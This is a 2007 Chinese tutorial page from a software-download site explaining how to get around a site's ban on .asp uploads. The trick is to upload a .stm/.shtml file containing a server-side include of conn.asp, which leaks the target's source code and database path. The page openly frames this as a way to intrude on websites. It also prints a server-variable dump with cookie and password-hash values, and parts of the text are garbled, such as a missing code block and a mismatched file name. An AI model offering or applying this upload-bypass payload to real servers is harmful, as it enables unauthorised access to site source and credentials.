• 网络学院
  • IT资讯
  • 操作系统
  • 网络技术
  • 软件应用
  • 办公软件
  • 编程技术
  • 网站架设
  • 数据库类
  • 平面设计
  • 多媒体类
  • 游戏资讯
  • 教学论文
  • 认证考试
不允许上传asp等文件时怎么办
  站点:
  • 首 页
  • 最新软件
  • 文章教程
  • 国内软件
  • 国外软件
  • 绿色软件
  • 源码下载
  • 字体下载
不允许上传asp等文件时怎么办
软件发布 不允许上传asp等文件时怎么办
网络软件 系统工具 应用软件 联络聊天 图形图像 多媒体类 行业软件 游戏娱乐 编程开发 安全相关 教育教学 数码软件 绿软下载
热门软件: QQ 瑞星 pplive e话通 木马克星 千千静听 office2000 五笔字根 Photoshop 视频分割
返回文章教程首页 >> 文章首页 >> 认证考试 >> 微软认证 >> MCSE指导 >> 不允许上传asp等文件时怎么办

不允许上传asp等文件时怎么办

添加时间: 2007-4-4 2:51:36  作者: 微软认证参考  阅读次数:20   来源: http://www.d9soft.com

        利用stm来上传,还能执行程序,代码:
说保存为stm或者shtml看看,运行如下:
HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg,
 image/pjpeg, application/x-shockwave-flash,
 application/vnd.ms-powerpoint, 
application/vnd.ms-excel, application/msword,
 */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive
 HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0
 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) 
HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; 
bblastactivity=1100265530; bbuserid=1;
 bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; 
ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ 
 HTTP_ACCEPT_ENCODING:gzip, deflate 当前文件名称:F:Web1.stm
  Web服务器的名称和版本:Microsoft-IIS/5.0
  主机名:localhost
  端口:80
  客户或客户代理IP地址:127.0.0.1
  客户或客户代理主机名:127.0.0.1
  PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路    径:F:Web1.stm
  客户端给出附加路径信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* 
  Quoted from Unkown:
  当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为: 
  <!--#include file="conn.asp"--> 
  直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦。
  原来就是如上所说的, 
  <!--#include file="conn.asp"--> 
  就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。
我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为: 
  <!--#include file="conn.asp"--> 
  又在同一目录下放了一个我的一个木马文件ok.asp在浏览器中请求test.stm,没有什么反映,一片空白。但是一查看源代码,狂晕,原来就是我的asp文件的内容!这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径,但是一个前提是服务器的对stm或者shtml的扩展没有删除!

 

上下文章:

 

上一篇文章: WindowsVista中的新防火墙之一(1) 下一篇文章: WinXP远程桌面控制中的技巧

相关文章:

  • 新蠕虫伪装成文件夹图标,让你防不胜防
  • Vista找不到Config文件夹的解决办法
  • 病毒猖獗,怎么打开电脑文件会较安全?
  • 卑鄙病毒:加密你的文件勒索你的钱
  • 端午节忠告:要警惕FLASH祝福文件里的包藏祸心

相关软件:

  • 文件管理精灵 V3.21
  • FTP远程文件同步更新程序 1.0.0.0
  • 系统文件备份工具 1.0a
  • excel文件转marc文件工具 V2.5
  • Excel文件转换 V0.5
  • CharlieFtpFileUpload 文件上传控件 V2.0

 

快速导航

  • 网络学院
  • 精品汇聚
  • 字体下载
  • 教程下载
  • ASP源码
  • PHP源码
  • Net源码
  • JSP 源码

微软认证分类导航

  • MCSE模拟题
  • MCSE真题
  • MCSE指导
  • MCSE介绍
  • MCSE动态

本类经典文章推荐

  • 专家答疑:微软认证系列问题求解
  • 专家指点:MCP考试新题型一一剖析
  • 雪球式学习法--MCSE学习探讨
  • RPC服务器安全配置
  • 最有“钱”途的证书
  • 微软认证信息系统工程师 (MCSE: M...
  • 顺利通过70-294考试的7大技巧
  • 基于.NET的MCSD认证介绍
  • 微软推出新MCSE:Security安全认证
  • 微软认证简介

MCSE指导阅读排行

  • hacktool.Rootkit病毒的删除方法
  • 让WindowsXP也能快速锁定计算机(1)
  • 如何在WinXP中重新安装或修复IE6
  • 将软件更新集成到Windows安装源文...
  • 解决“不小心删除SAM文件”的方法
  • 解除组策略里应用程序的锁定
  • 优化WinXP技巧4:一台电脑使用两台...
  • windows系统整理完美技巧五则
  • Windows系统Hosts文件的作用
  • SQLServer2005数据库镜像简介

微软认证阅读总排行

  • MCSD简介
  • 微软考试成绩查询最新办法
  • hacktool.Rootkit病毒的删除方法
  • 让WindowsXP也能快速锁定计算机(1)
  • 尴尬!微软反盗版验证技术被自己攻...
  • 如何在WinXP中重新安装或修复IE6
  • 如何清除Windows系统托盘上的图标
  • 微软MSCE认证又出新招
  • 微软认证系统工程师 (MCSE)(1)
  • 将软件更新集成到Windows安装源文...

广告位置

字母检索 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 回到顶部

关于我们 | 版权声明 | 免责条款 | 广告联系 | 软件发布 | 下载帮助 | 下载排行 | 网站地图 | 特别鸣谢 | 友情连接

copyright; 2005-2008 D9soft.com 第九软件网 版权所有